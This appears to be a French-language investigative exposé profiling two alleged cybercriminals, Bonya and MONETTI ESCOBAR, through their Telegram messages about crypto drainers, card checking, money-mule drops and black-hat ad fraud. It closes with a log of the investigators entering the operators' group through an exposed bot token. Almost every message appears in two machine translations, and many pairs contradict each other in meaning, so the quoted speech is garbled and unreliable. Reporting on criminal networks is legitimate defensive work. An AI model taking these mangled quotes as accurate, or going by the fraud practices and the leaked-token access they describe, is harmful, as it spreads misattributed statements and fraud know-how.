Qui a un « dreiner » soumis au test AML ? Uniquement avec un dépôt ou une autorisation du garantQui a un « drainer » pour le test AML ? Uniquement avec dépôt ou prêts à l'emploi avec garantie ?
B
Bonya2026-01-11 03:14
Il y a quelqu'un sur Facebook, et c'est un pote. J'ai besoin qu'on me réapprovisionne en FB, le prix est négociable.Il y a des gens qui ont joué sur Facebook, et il y a des paris. Il faut recharger le compte Facebook ; on se mettra d'accord sur le prix.
-- SТYХ СНAT [ STYXMARKET.ST ] (2 messages) --
B
Bonya2025-12-05 12:04
Besoin de factures, Payzaty, Cashfree, Eportal 3DSBesoin de factures, Payzaty, Cashfree, Eportal 3DS
B
Bonya2025-11-22 11:14
Il y a un modérateur sur le chat ?Y a-t-il un modérateur sur ce chat ?
-- Chat « Arbitrage de trafic » (2 messages) --
B
Bonya2025-11-24 14:50
100%100%
B
Bonya2025-11-24 14:49
La chaîne Tg va être détournéeLa chaîne TG va être piratée
-- Raven CC checker (2 messages) --
B
Bonya2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Bonya2025-11-21 21:18
/check/check
-- Chat de Vision Browser (2 messages) --
B
Bonya2025-11-14 16:47
Merci.Merci
B
Bonya2025-11-14 16:47
« vicen werk » en russe ?« Vision Work » en russe ?
-- 💬ONE|Chat (86 messages) --
B
Bonya2025-03-05 17:06
Les gars, indiquez-moi un magasin où je peux acheter des patins.Les gars, donnez-moi une adresse où je peux trouver des terrains.
B
Bonya2025-03-05 16:22
Je n'arrive même pas à faire un manucureIl n'est même pas capable de faire une manucure
B
Bonya2025-03-05 16:22
de mêmede même
B
Bonya2025-03-05 16:21
Putain, dis-moi si le mentor a un salon de discussion avec les élèves ou pas.Putain, quelqu'un peut-il me dire si le tuteur a un chat avec ses élèves ou pas ?
B
Bonya2025-03-05 16:10
et à qui ça appartient ?Et qui est « ts » ?
B
Bonya2025-03-05 15:44
Ce n'est pas difficile, mais il n'y a pas de manuels complets ici, seulement des tutoriels.Ce n'est pas difficile, mais il n'y a pas de manuels complets ici, seulement des conseils des tuteurs.
B
Bonya2025-03-05 15:42
En gros, oui, si tu sais comment t'y prendre.En fait, oui, si tu sais comment faire
B
Bonya2025-03-05 15:42
une demi-journéeune demi-journée
B
Bonya2025-03-05 15:42
Le premier en compte 600, mais il ne répond pas.Il ne répond pas aux 600 premières personnes.
B
Bonya2025-03-05 15:41
Si vous en avez les moyens, optez pour celui qui coûte 200 $.Si tu as de l'argent, prends celle qui demande 200 $.
B
Bonya2025-03-05 13:55
Qui est doué pour expliquer qu'il existe un salon de discussion pour les élèves ?Y a-t-il un forum de discussion pour les élèves qui suivent les cours de science-fiction là-bas ?
B
Bonya2025-03-03 15:10
ChèquesReçus
B
Bonya2025-03-03 15:10
Celui qui passe l'aspirateurQui passe l'aspirateur
B
Bonya2025-03-03 15:10
D'accordIl y en a
B
Bonya2025-03-03 15:10
Il y a sûrement des putes qui s'y connaissent en informatique.Mais là, c'est sûr, il y a des arnaques avec les logiciels
B
Bonya2025-03-03 15:09
C'étaitC'était
B
Bonya2025-03-03 15:09
Ah, ça, c'est bien.Oh, ça, c'est cool !
B
Bonya2025-03-03 15:09
Trinuriuet ruruTrinuriouet ruru
B
Bonya2025-03-03 15:09
Et ils sont en train d'être collectésEt on les ramasse
B
Bonya2025-03-03 15:09
Tip est juste assis là, en train de déballer des emballagesCe type est assis là, en train de se branler
B
Bonya2025-03-03 15:04
Pourquoi y a-t-il des plaques d'immatriculation ukrainiennes ?Pourquoi des numéros en ukrainien ?
B
Bonya2025-03-03 15:03
J'ai dit « kc ».J'ai dit « kts »
B
Bonya2025-03-03 15:03
J'ai compris.J'ai compris
B
Bonya2025-03-03 15:03
Si c'est compliqué, tu vas perdre ton chapeau melon.Si tu fais n'importe quoi ici, tu vas te faire virer
B
Bonya2025-03-03 15:03
Putain, comparons le nombre de fois où tu vas relancer le rekul sur Facebook pendant que j'enlève le roux.Allez, fais-moi voir : combien de fois vas-tu relancer le re-call sur Facebook pendant que je filme ?
B
Bonya2025-03-03 15:02
Pour une escorteService d'escorte
B
Bonya2025-03-03 15:02
Ces types ont un développement à la « Chitty Chitty » qui donne envie de se branler.Ces types de tricheurs, ça donne envie de se branler à fond
B
Bonya2025-03-03 15:02
Putain, y a que des « wokers » ici.Putain, y a que des travailleurs manuels par ici
B
Bonya2025-03-03 15:02
Quel type de tables ?Quelles tables ?
B
Bonya2025-03-03 15:01
Tu auras 30 ans si tu as une belle voix.Tu en auras 30 si tu as une belle voix
B
Bonya2025-03-03 15:01
Il y a plus d'argentIl y a plus d'argent là-bas
B
Bonya2025-03-03 15:01
Venez travailler dans mon entreprise.Venez travailler au centre culturel avec moi
B
Bonya2025-03-03 15:00
NonNon
B
Bonya2025-03-03 14:59
PlategamPlategam
B
Bonya2025-03-03 14:59
+ Je ne sais pas comment utiliser la fonction de relecture+ Je n'y comprends rien aux slogans
B
Bonya2025-03-03 14:59
Les bonnes offres sont rares.C'est difficile de tomber sur de bons drops
B
Bonya2025-03-03 14:58
Ou bien existe-t-il une version 1.0 ?Ou bien la version 1.0 est disponible
B
Bonya2025-03-03 14:58
Il n'y a que 2,0 phish ici.Et là, des fiches pour un courant de 2,0
B
Bonya2025-03-03 14:58
Ou alors, mieux vaut 1.0 que 2.0.Bon, mais vaut mieux 1.0 que 2.0
B
Bonya2025-03-03 14:57
Avec les mammouthsAvec les mammouths
B
Bonya2025-03-03 14:57
La version 2.0 ne fonctionne pas si on reste assis à ne rien faire.2.0 : ça ne sert à rien de rester là à raconter n'importe quoi
B
Bonya2025-03-03 14:57
Je m'intéresse davantage à la circulation.Ce n'est plus moi qui ai le plus de trafic
B
Bonya2025-03-03 14:57
Voici les « X » de RooVoici les « X » sur la main
B
Bonya2025-03-03 14:56
Mais ce ne sont pas des slogans publicitairesMais ce ne sont pas des équipes de publicité
B
Bonya2025-03-03 14:56
C'est vrai. Je connais quelqu'un qui le fait.(Ils le font) J'ai des connaissances qui le font
B
Bonya2025-03-03 14:56
Ce n'est pas le cas si tu sais comment gagner entre 400 et 500 par jour.Mais bon, si on sait s'y prendre, certains arrivent à en faire 400 à 500 par jour.
B
Bonya2025-03-03 14:55
Alors, où est le problème ?)Bon, alors, qu'est-ce que j'ai oublié ici ? )
B
Bonya2025-03-03 14:55
Il y a un lien vers le manuelIl y a un lien vers le manuel
B
Bonya2025-03-03 14:54
Voilà le genre de mainsVoilà le genre de trucs qu’ils vont faire
B
Bonya2025-03-03 14:54
Baver et reluquer comme un fou juste pour se faire branler.Pour baiser et prendre son pied, on peut en baver et écarquiller les yeux dans tous les sens
B
Bonya2025-03-03 14:54
Bon, c'est quoi le problème ? C'est le même travail.Bon, et alors, où est le problème ? C'est exactement le même travail.
B
Bonya2025-03-03 14:53
Il faudra un mois pour arriver dans la zoneIls arriveront dans la zone d'ici un mois
B
Bonya2025-03-03 14:53
Et il n'y a nulle part où aller. Si tu as un peu de jugeote, tu t'en rendras compte. Sinon, tu n'as qu'à filer d'ici.Et puis, ça ne mène nulle part : si tu as la tête sur les épaules, tu t'en sortiras ; sinon, tu n'as rien à faire ici.
B
Bonya2025-03-03 14:53
Qu'est-ce que tu veux ?Qu'est-ce que tu voulais ?
B
Bonya2025-03-03 14:53
PublicitéPublicité
B
Bonya2025-03-03 14:52
Ça fait deux jours que je suis là et la version 2.0 ne m'intéresse pas. Je trouvais ça cool.Ça fait deux jours que je suis là et la version 2.0 ne m'intéresse pas, je pensais que ce serait marrant.
B
Bonya2025-03-03 14:52
Et régale-toi d'un mammouthEt adopter un mammouth
B
Bonya2025-03-03 14:52
Réfléchis bien à ce que tu vas dire.Je vais réfléchir à ce que je vais répondre.
B
Bonya2025-03-03 14:52
Il n'y a pas de secretsIl n'y a pas de secrets ici
B
Bonya2025-03-03 14:52
Que va-t-il t'offrir ?Qu'est-ce que cela vous apportera ?
B
Bonya2025-03-03 14:52
Mais à quoi ça sert si le manuel contient exactement les mêmes informations ?Mais à quoi ça sert si toutes ces infos sont dans le manuel ?
B
Bonya2025-03-03 14:51
Il aura le temps de répondre à tous vos messages de maliceOn va pas pouvoir répondre à tout le monde, putain.
B
Bonya2025-03-03 14:51
Quelle séance d'entraînement !Quelle pratique ?
B
Bonya2025-03-03 14:51
Il y a 100 personnes là-dedans.Il y en a environ 100 chez lui
B
Bonya2025-03-03 14:51
Pourquoi tu ne me donnerais pas un peu d'argent ? Je te donnerai le mode d'emploi de la pince en échange.Si vous me donnez un peu de fric, je vous enverrai le mode d'emploi de la fixation.
B
Bonya2025-03-03 14:50
Lors de la fixationDans la fixation
B
Bonya2025-03-03 14:50
Tu n'as pas besoin d'un manuel pour t'apprendre tout ça.Et puis merde à vous tous, la formation, le manuel, il est là
B
Bonya2025-03-03 14:50
La version 2.0 est ce qu'elle est.2.0 Ce qui était, c'est ce qui est
B
Bonya2025-03-03 14:50
C'est quoi le problème, bordel ?Mais c'est quoi ce casse-tête, là ?
B
Bonya2025-03-03 14:48
C'est toi qui as commencé ?Tu t'es déjà lancé ?
B
Bonya2025-03-03 14:48
Pas de « coo-coo »Ça ne marche pas du tout
B
Bonya2025-03-03 14:48
Il y a un accès sur le lkIl y a un meurtre dans « LK »
B
Bonya2025-03-03 14:48
C'est quoi le problème avec l'lk ?Quels sorts utiliser en LK ?
B
Bonya2025-03-03 14:48
Lequel d'entre vous est un « connard », comme vous dites ?Mais d'où tu sors ces conneries, comme on dit ?
B
Bonya2025-03-03 14:47
Je ne comprends pas ce que tu veux dire ici.Là, je n'ai pas bien compris ce que tu as dit.
B
Bonya2025-03-03 14:46
S'ils sont connectés, tant mieux.Si on entre dans le LC, alors ZBS
B
Bonya2025-03-03 14:46
Alors, est-ce qu'ils se connectent ?Alors, vous allez sur le forum ?
B
Bonya2025-03-03 14:45
Je ne sais pas comment ils les filment.Je ne sais pas comment on les filme
B
Bonya2025-03-03 14:45
Des toutous à mettre au rebut ?Des poils à raser ?
B
Bonya2025-03-03 14:45
Putain, y a un putain de bouton-poussoirEt en plus, il faut encore taper sur ces trucs là-bas
B
Bonya2025-03-03 14:42
Je le verse moi-mêmeC'est moi qui verse
B
Bonya2025-03-03 14:42
J'ai fini par comprendre, putain, que c'est pas pour les connards.J'ai compris, putain, c'est pas pour rien
B
Bonya2025-03-03 14:41
Mec, ils ne vendent rien avec ces jetons ici, c'est un jeton de paie.Mec, ici on ne vend rien avec des jetons, il faut payer en jetons.
B
Bonya2025-03-03 14:41
Je comprends, il n'y a nulle part où le verserJ'ai compris qu'il n'y avait nulle part où le verser ici
B
Bonya2025-03-03 14:40
La version 2.0 standard, je crois.Des 2.0 classiques, en quelque sorte
B
Bonya2025-03-03 14:40
Ce n'est pas comme s'ils engorgeaient la circulationDonc, ici, on ne génère pas de trafic
-- FbStor - Le forum des webmasters à succès ! (23 messages) --
B
Bonya2025-02-26 07:51
Bon, fais ce que tu veux, putain.Bon, eh bien, fais ce que tu veux là-bas, on s'en fiche
B
Bonya2025-02-26 07:50
Un écolier, 200₽.Bon, je vais donner 200 ₽ à cette écolière.
B
Bonya2025-02-26 07:50
Ça va marcherÇa fera l'affaire
B
Bonya2025-02-26 07:50
Tu vas tomber sur un sans-abri dans la rue.Dans la rue, tu croises un clochard
B
Bonya2025-02-26 07:50
Ainsi, chacun croit en son propre visage, quel qu’il soit.Tout le monde vérifie son identité là-bas, on s'en fiche de qui c'est
B
Bonya2025-02-26 07:50
Sur ton visage.Sur son propre visage
B
Bonya2025-02-26 07:49
Mais bon, peu importe, je l'ai déjà fait dix fois.Mais en fait, je m'en fiche, j'ai genre 10 comptes vérifiés.
B
Bonya2025-02-26 07:49
Alors dis-moi, tu ne fais que débiter des bêtises.Alors dis-moi, tu racontes n'importe quoi ?
B
Bonya2025-02-26 07:49
Vous pouvezC'est possible
B
Bonya2025-02-26 07:49
Sur ton visage.Sur son propre visage
B
Bonya2025-02-16 20:26
au lieu de les mettre dans la merde avec une formation bidon et de les envoyer s'occuper de la circulation.et pas pour leur faire miroiter une formation bidon et leur soutirer du trafic
B
Bonya2025-02-16 20:25
c'est normal sur UBT, YouTube, etc.les vidéos habituelles sur UBT, TT, YouTube, etc.
B
Bonya2025-02-15 17:31
XzХз
B
Bonya2025-02-15 17:31
Sous prétexte de formationSous prétexte de formation
B
Bonya2025-02-15 17:31
Vers les canauxSur les chaînes
B
Bonya2025-02-15 17:31
C'est juste la circulation due aux passants.C'est juste que le trafic généré par les gens augmente
B
Bonya2025-02-15 17:31
Du coup, ce type dit de s'abonner à toutes ses chaînesDu coup, ce type dit de s'abonner à toutes ses chaînes
B
Bonya2025-02-15 16:36
Tu n'es pas obligé d'écrireHui Nyu propose : vous pouvez ne pas écrire
B
Bonya2025-02-06 15:11
Si tu ne maîtrises pas les bases du service, tu vas te retrouver…Si tu ne connais pas les bases, comme la façon de couler, comment vas-tu t'en sortir ?
B
Bonya2025-02-06 15:11
Il y a un bouton pour modifier l'aipi, tu devrais au moins faire une recherche sur Google.En cliquant sur ce bouton, l'adresse IP change ; tu peux toujours chercher sur Google si tu veux.
B
Bonya2025-02-06 15:09
Vous pouvez modifier l'aipi qui s'y trouve en le faisant pivoter.Là, on peut modifier la rotation de l'API
B
Bonya2025-02-06 15:09
Pourquoi 1 ? C'est le même MobilePourquoi le 1 ? Ce sont pourtant des mobiles.
-- CryptoGrab - Chat d'entraide (10 messages) --
B
Bonya2025-02-06 15:31
Ce n'est pas si simpleCe n'est pas si simple que ça
B
Bonya2025-02-06 15:31
C'est facile.Izi
B
Bonya2025-01-23 20:30
Pas un seul exempleIl n'y a pas qu'un seul exemple
B
Bonya2025-01-23 20:30
Ce n'est pas drôle que je n'aie trouvé aucune annonce pour des tests de dépistage de la LAM sur Internet.C'est quand même bizarre que je n'aie trouvé aucune publicité pour les tests AML sur Internet
B
Bonya2025-01-23 17:20
Il n'y a absolument rien sur l'AML.Il n'y a absolument rien sur AML
B
Bonya2025-01-23 17:20
J'ai essayé AML sur Facebook pour trouver des fichiers américains, y compris des anciens, que l'on ne trouve pas sur Internet.J'ai essayé de trouver des informations sur l'AML sur Facebook, mais je n'ai pas trouvé non plus de liens pertinents, même anciens, sur Internet.
B
Bonya2025-01-23 17:19
Alors, quel genre d'offre envisages-tu ?Bon, et sinon, quelle offre tu prévois de faire ?
B
Bonya2025-01-23 17:16
Utilisez-vous AML ?Et toi, tu joues à AML ?
B
Bonya2025-01-21 20:38
Si vous utilisez Facebook, vous aimeriez peut-être obtenir des précisions sur quelques pointsY a-t-il quelqu'un qui s'occupe de la page Facebook ? J'aimerais poser quelques questions.
B
Bonya2025-01-20 11:08
Quelqu'un aurait-il des exemples de CREOS pour AML ?Quelqu'un aurait-il des exemples de créations pour l'AML ?
-- Rolex | discussion générale (28 messages) --
B
Bonya2024-09-11 15:29
Que font les Lituaniens sur quel terrain ?Et sur quelle plateforme est-ce qu'on s'en prend à la Lituanie ?
B
Bonya2024-09-11 15:21
Tu es en train de tripoter la vis ?Mais t'es complètement à l'ouest ou quoi ?
B
Bonya2024-09-11 15:20
C'est juste que ces sites sont très restrictifs et qu'il faut passer un temps fou à se débattre avec euxC'est juste que ces plateformes limitent vraiment beaucoup le travail et qu'il y a tellement de galères avec elles
B
Bonya2024-09-11 15:19
J'ai une idée de thème en tête. S'ils la concrétisent, ça va être carrément génial.J'ai eu une idée de sujet là-bas, je l'ai écrite ; si on la réalise, ça va être génial.
B
Bonya2024-09-11 15:19
Je ne vois pas beaucoup de bûches sur la finca.Je ne vois pas vraiment de logos sur la Finke
B
Bonya2024-09-11 15:19
Il y a vraiment des trucs de dingue qui se passent avec toutes ces salles.Mais bon, ces types sont en train de se prendre la tête avec toutes ces plateformes
B
Bonya2024-09-11 15:16
C'est exactement ce que je veux dire, c'est comme un gué sur un gué.Eh bien, je dis juste que c'est de la triche sur la triche.
B
Bonya2024-09-11 15:15
Je ne comprends pas ce qui va mieux maintenant, je constate que personne ne travaille en Finlande.Je n'arrive vraiment pas à comprendre ce qui fonctionne mieux en ce moment ; je vois que chez tout le monde, il y a un problème avec la carte bancaire.
B
Bonya2024-09-11 15:08
Bon, tu as une chance sur deux d'avoir de la chance avec les proxys.Bon, ça se joue à 50/50, si on a de la chance avec les proxys
B
Bonya2024-09-11 15:07
Mais pour que vous compreniez bien : aujourd’hui, avec les proxys « luxe », même sur Viber, dès que vous vous connectez, ça pète les plombs.Mais pour que tu comprennes : en ce moment, avec ces proxys de luxe, même sur Viber, quand tu te connectes, ça plante.
B
Bonya2024-09-11 15:07
Bon, je ne sais pas trop pour les canettes européennes.Bon, je n'y connais rien aux banques européennes
B
Bonya2024-09-11 15:07
Dans lkDans le profil
B
Bonya2024-09-11 15:06
Autrefois, les épiceries fines comptaient dix chambres froides.Avant, les vernis en 10 couches tenaient mieux
B
Bonya2024-09-11 15:06
Bon, le 922 est lui aussi à 1 et tient bon.Bon, le 922 aussi, ils en prennent un et le gardent
B
Bonya2024-09-11 15:05
Même en privé, après trois visites, ça les fait flipper.Même en mode privé, après trois tentatives, ça les énerve
B
Bonya2024-09-11 15:05
Si 1 mandataire représente 1 à 2 banquesSi 1 proxy correspond à 1 ou 2 banques de courant
B
Bonya2024-09-11 15:05
Eh bien, ça dépend de la banqueÇa dépend de la banque, en fait
B
Bonya2024-09-11 15:04
Les mandataires sont souvent des salauds dans ces sornettes de laksheriDans les sites de luxueuses putains, les proxys sont souvent infectés
B
Bonya2024-09-11 08:44
Est-ce qu'il dort ?Et lui, il dort ?
B
Bonya2024-09-11 08:40
Oh, c'est une excellente idée.C'est ZBS qui a eu cette idée
B
Bonya2024-09-11 08:40
Il n'y a pas un marché aux puces ou quelque chose comme ça par là ?Et pourquoi n'y a-t-il pas de brocantes un peu partout chez eux ?
B
Bonya2024-09-11 08:40
C'est n'importe quoiHuevo
B
Bonya2024-09-11 08:39
BilyaBilya
B
Bonya2024-09-11 08:39
Y a-t-il des salons de discussion ?Et est-ce qu'il y a des forums là-bas ?
B
Bonya2024-09-11 08:38
Est-ce que quelqu'un saitQuelqu'un sait-il
B
Bonya2024-09-11 08:38
Est-ce que les habitants de la finca utilisent TG ?
Est-ce que les gens utilisent [REDACTED] en Finlande ?B
Bonya2024-09-10 12:14
Merci.Merci
B
Bonya2024-09-10 12:13
Quelle heure est-il en Finlande ?C'est l'heure de la pause à la Finke
-- Actualités/vérifications/revenus💃🛍 (37 messages) --
B
Bonya2024-06-16 17:17
Je ne vois personne qui la défende avec acharnementJe ne vois pas ici de fervents défenseurs de celle-ci
B
Bonya2024-06-16 17:17
Bon, en somme, la situation a été exposée et chacun fait son choix ; le fait que seul l'administrateur Pasha la défende en dit long.Bon, j'ai expliqué la situation, et maintenant chacun fait son choix ; le fait que seul l'administrateur Pasha la défende en dit long.
B
Bonya2024-06-16 17:15
Et elle n'a pas versé d'argent cette fois-ci non plusEt elle n'a encore pas payé
B
Bonya2024-06-16 17:15
Non, elle nous l'a transféré, mais comme nous n'avions pas le compte principal pour transférer l'argent, nous avons écrit à Vika en dernier recours.Non, elle nous l'a refilée, mais on n'avait pas de compte principal pour transférer l'argent, alors on a écrit à Vika en dernier recours.
B
Bonya2024-06-16 17:14
Au début, tout allait bien pour nous aussi, mais ces derniers temps, ton argent disparaît sans arrêt.Au début, tout allait bien chez nous aussi, mais ces derniers temps, vous perdez sans cesse de l'argent.
B
Bonya2024-06-16 17:14
Est-ce que je fais du spam ? Je suis juste là à dire la vérité aux gens. Tu peux jeter ça. Fais savoir aux gens comment tu travailles.Et moi, est-ce que j'envoie du spam ? Je passe mon temps à dire la vérité aux gens. Tu peux supprimer ça, ça ne changera rien. Que les gens sachent comment vous travaillez.
B
Bonya2024-06-16 17:13
Quand on en a un comme çaSi cela vous arrive un jour
B
Bonya2024-06-16 17:13
Il est donc temps pour toi de réfléchirIl est donc temps pour vous de réfléchir
B
Bonya2024-06-16 17:13
Nous travaillons également avec nei depuis longtemps et c'est la deuxième fois que cela se produit.Nous travaillons aussi avec elle depuis longtemps et c'est déjà la deuxième fois que cela arrive.
B
Bonya2024-06-16 17:13
Et elle a enregistré les gs en disant : « Tu sais comment ça marche. »Et elle a noté « gs » et a dit que vous saviez comment ça fonctionnait
B
Bonya2024-06-16 17:13
C'est exactement ça. Reprenons depuis le début : on a pris sa carte pour retirer de l'argent, on a mis 60 000, elle est allée les retirer et elle nous a écrit que l'argent ne serait pas là parce que le distributeur avait avalé sa carte, et voilà, on vient de jeter 60 000 par la fenêtre.C'est exactement ça. Bon, commençons par le début : on a pris sa carte bancaire, on a déposé 60 000, elle est allée retirer l'argent et nous a dit qu'il n'y en aurait pas, prétextant que le distributeur avait avalé sa carte. Bref, on a tout simplement perdu nos 60 000.
B
Bonya2024-06-16 17:11
Ce n'est pas elle qui nous tientEt ce n'est pas nous qui sommes chez elle ?
B
Bonya2024-06-16 17:11
Même si on nous a bien volé 60 000Même si on nous a volé 60 000
B
Bonya2024-06-16 17:11
Normal ? On a tout expliqué ici. Tu es en train de nous traiter d'imbéciles.« Normaux » ? On a tout expliqué ici, et vous dites qu'on est des idiots.
B
Bonya2024-06-16 17:10
Tu la défendsVous la défendez
B
Bonya2024-06-16 17:10
Elle a toujours notre argentElle a gardé notre argent
B
Bonya2024-06-16 17:10
TousTout
B
Bonya2024-06-16 17:10
Alors qu'un homme s'était vu verser 60 000, elle a dit qu'il n'y avait pas d'argent.On lui a versé 60 000, mais elle a dit qu'il n'y aurait pas d'argent.
B
Bonya2024-06-16 17:10
Décrite*Ont décrit*
B
Bonya2024-06-16 17:10
On vous a expliqué toute la situationOn t'a expliqué toute la situation
B
Bonya2024-06-16 17:09
Qui va craquer ? Elle ou nous.Qui est la « dropoid » : elle ou nous ?
B
Bonya2024-06-16 17:09
On a 60 000 à la banque. Où est l'argent ?On a versé 60 000, où est passé l'argent ?
B
Bonya2024-06-16 17:09
On t'a expliqué la situation en détail, peu importe ton sexe.Quelles femmes t'ont expliqué toute la situation ? Le sexe n'a absolument aucune importance.
B
Bonya2024-06-16 17:08
Retire 60 000 et arrête là pour aujourd’hui.Gagner 60 000 et passer à autre chose
B
Bonya2024-06-16 17:08
Ou va te faire foutre, dans la limite du raisonnable.Ou alors, putain, dans la mesure du raisonnable
B
Bonya2024-06-16 17:08
Les gens n'ont rien à payerD'où les gens vont-ils tirer l'argent pour payer ?
B
Bonya2024-06-16 17:08
Et il dit que sa carte a été endommagée et qu'il n'a plus d'argent.Et il dit que la carte est bloquée, qu'il n'y a pas d'argent
B
Bonya2024-06-16 17:08
Un homme s'est fait verser 60 000, elle est partie tirer.On a versé 60 000 à cette femme, qui est partie tourner un film
B
Bonya2024-06-16 17:07
Alors, tu vas me donner les faits.Alors, explique-moi ça en détail
B
Bonya2024-06-16 17:07
Alors, c'est qui le coupable, putain ? C'est moi le responsable ?Alors, c'est qui le coupable, putain ? C'est moi le connard ?
B
Bonya2024-06-16 17:07
Tu n'as rien à dire ?Tu n'as rien à dire ?
B
Bonya2024-06-16 17:07
Sinon, je n'arrivais pas à taper ce putain de code.Ou alors, putain, avec mes mains de merde, j'ai pas réussi à taper le code PIN
B
Bonya2024-06-16 17:06
Mais comment un distributeur a-t-il pu bloquer la carte, bordel ?Mais putain, comment un distributeur a-t-il pu avaler ma carte ?
B
Bonya2024-06-16 17:06
PigeonsAspirations
B
Bonya2024-06-16 17:06
Et toi, tu te donnes à fond pour elle.Et vous, pourquoi vous la téléchargez, bordel ?
B
Bonya2024-06-16 17:06
Vous, les « naturels », vous êtes vraiment des connards. Y a une putain de nana assise là qui est en train de se prendre la tête avec son argent, et sa carte s'est fait avaler par un distributeur.Putain, vous êtes vraiment des tarés, vous avez une connerie dans la tête, ça vous prend la tête, elle s'est fait bloquer sa carte par le distributeur
B
Bonya2024-06-16 16:40
@kysia1987, ça ne marche pas, c'est une arnaque ; j'ai donné un dropkick et j'ai fusionné avec 60k@kysia1987 : c'est une arnaque, ça a chuté et j'ai perdu 60 000
MONETTI ESCOBAR : Le patron silencieux
Contrairement aux 261 messages de Bonya, MONETTI n'en a publié que 10 messages publics — le tout dans un seul fil de discussion sur Chat TraFFeeQ (Arbitrage de trafic ADS/SEO « noir »), en défense d'un collègue :
Chat TraFFeeQdécembre 2025
« Un homme fait son travail, il est payé pour ça… Ça te dit d’en discuter ? »
« Quelqu'un fait son travail, on le paie pour ça, qu'y a-t-il à discuter ? »
Considérer les activités criminelles comme « un travail comme un autre »
Chat TraFFeeQdécembre 2025
« Il n'y a rien à discuter avec toi »
Il n'y a rien à discuter avec toi.
Autorité dédaigneuse — mentalité de patron, au-dessus de tout débat
Chat TraFFeeQdécembre 2025
« Il y a plein de choses à faire à part toi ! »
Sans toi, j'ai de quoi m'occuper)
Cela implique plusieurs opérations simultanées qui requièrent son attention
Les groupes [REDACTED] de MONETTI en disent long : Medusa Google Ads (fraude au PPC de type « black hat »), un Chaîne « Deepfakes » (supports synthétiques utilisés à des fins de fraude), et CHAT MARLBORO (privé, inconnu). L'abonnement [REDACTED] Premium, disponible 24 h/24 et 7 j/7, et « Есть предложение » (« J'ai une proposition à te faire ») Son parcours professionnel laisse entrevoir quelqu’un qui considère la cybercriminalité comme une activité à plein temps.
MONETTI ESCOBAR : Historique complet des messages (10 messages)
-- TraFFeeQ Chat | Arbitrage de trafic | Black ADS/SEO | (9 messages) --
MOI
MONETTI ESCOBAR2025-12-06 20:42
Laisse ça !Laisse tomber !
MOI
MONETTI ESCOBAR2025-12-06 20:42
Un homme fait son travailCet homme vaque à ses occupations
MOI
MONETTI ESCOBAR2025-12-06 20:42
Aucune agressionAucune agression
MOI
MONETTI ESCOBAR2025-12-06 20:40
Ne t'en fais pas pour ça non plusNe t'inquiète pas pour ça non plus
MOI
MONETTI ESCOBAR2025-12-06 20:39
Parle-lui, mon pote. Il n'a pas l'interdiction de faire ça.Va lui parler, mec, personne ne lui a interdit de faire ça.
MOI
MONETTI ESCOBAR2025-12-06 20:39
Il y a plein de choses à faire à part toi !)Il y a autre chose à faire que de m'occuper de toi !)
MOI
MONETTI ESCOBAR2025-12-06 20:39
Il n'y a rien à discuter avec toiIl n'y a rien à discuter avec toi.
MOI
MONETTI ESCOBAR2025-12-06 20:38
C'est écrit à côté de son surnom. Pas besoin de cliquer, tu le verras tout de suite.À côté de son pseudo, c'est écrit : « Ne le prends pas à la légère », lis bien
MOI
MONETTI ESCOBAR2025-12-06 20:38
Cet homme fait son travail, il est payé pour ça (j'aimerais en discuter)Chacun fait son travail, il est payé pour ça, si ça vous plaît, n'hésitez pas à en discuter)
-- Medusa | Google Ads | Chat (1 message) --
MOI
MONETTI ESCOBAR2025-09-23 18:07
😍😍
![Profil [REDACTED] de MONETTI ESCOBAR](/_mirror/redacted-logo.svg)
Capture d'écran n° 2 — Profil
[REDACTED] de MONETTI.
![Profil [REDACTED] de Bonya](/_mirror/redacted-logo.svg)
Capture d'écran n° 3 — Profil de Bonya. À noter : DC2 (Amsterdam).
Section 7 : La « Panic Room »
Après que THE ENABLERS REGISTRY eut accédé au groupe d'opérateurs via le bot [REDACTED] exposé, l'échange suivant a eu lieu. Le journal de discussion ci-dessous a été traduit en anglais, le texte original en russe étant conservé en italique. L'identité utilisée pour l'accès a été masquée.
— REDACTED s'est connecté à l'aide d'un jeton de bot exposé —
R
CENSURÉ25-03-2026 13:03:43
/start
MOI
MONETTI ESCOBAR25-03-2026 13:06:53
?
MOI
MONETTI ESCOBAR25-03-2026 13:07:03
QuiQui
B
Bonya25-03-2026 13:07:14
XzХз
R
CENSURÉ25-03-2026 13:07:14
Bonjour, il suffit d'enregistrer vos données, attendez une minute
MOI
MONETTI ESCOBAR25-03-2026 13:07:24
Mais putain alors !C'est quoi ce bordel ?
B
Bonya25-03-2026 13:07:27
PutainBaiser
B
Bonya25-03-2026 13:07:28
C'est luiC'est qui ?
MOI
MONETTI ESCOBAR25-03-2026 13:07:42
Ah bon.Ahaha
MOI
MONETTI ESCOBAR25-03-2026 13:07:44
C'est quoi ce bordel ?Putain...
B
Bonya25-03-2026 13:07:53
Le bot a été piratéIls ont piraté le bot
B
Bonya25-03-2026 13:08:16
On m'a dit que notre défense était complètement à la ramasse.Au fait, on m'a dit que chez nous, la défense était vraiment dingue.
B
Bonya25-03-2026 13:08:22
Eh bien, il y en a unEnfin, un type comme ça
B
Bonya25-03-2026 13:08:43
C'est comme pirater un bot via une attaque de possibly phishing.Avec notre bot, casser un « fish », c'est aussi simple que de se cogner un doigt contre l'autre.
MOI
MONETTI ESCOBAR25-03-2026 13:09:09
@devosus
MOI
MONETTI ESCOBAR25-03-2026 13:09:21
[SUPPRIMÉ].[SUPPRIMÉ]
MOI
MONETTI ESCOBAR25-03-2026 13:09:24
C'est qui, ça ?C'est qui ?
B
Bonya25-03-2026 13:10:29
Vérifie ton profil.Va jeter un œil à ton profil
B
Bonya25-03-2026 13:10:32
C'est un pirate informatiqueC'est un pirate informatique
B
Bonya25-03-2026 13:10:35
Au sens propre.Au sens propre
B
Bonya25-03-2026 13:10:41
Traduction de ce qu'il canaliseOn a traduit ce qu'il écrit sur sa chaîne
B
Bonya25-03-2026 13:10:55
[SUPPRIMÉ — Bonya copie-colle le message provenant de la chaîne qui a signalé leur domaine, afin d'essayer d'identifier la personne qui les a signalés]
B
Bonya25-03-2026 13:12:19
Bon, euh…Bon, tant pis
B
Bonya25-03-2026 13:12:23
J'en ai aucune idée, putain, de qui c'est.Je sais pas qui c'est, putain
B
Bonya25-03-2026 13:12:25
Mais pas pour toujoursMais ça ne présage rien de bon
B
Bonya25-03-2026 13:12:47
@devosus, pensons à la défense avant de nous faire laminer.@devosus, pense à te protéger avant qu'on te défonce le cul
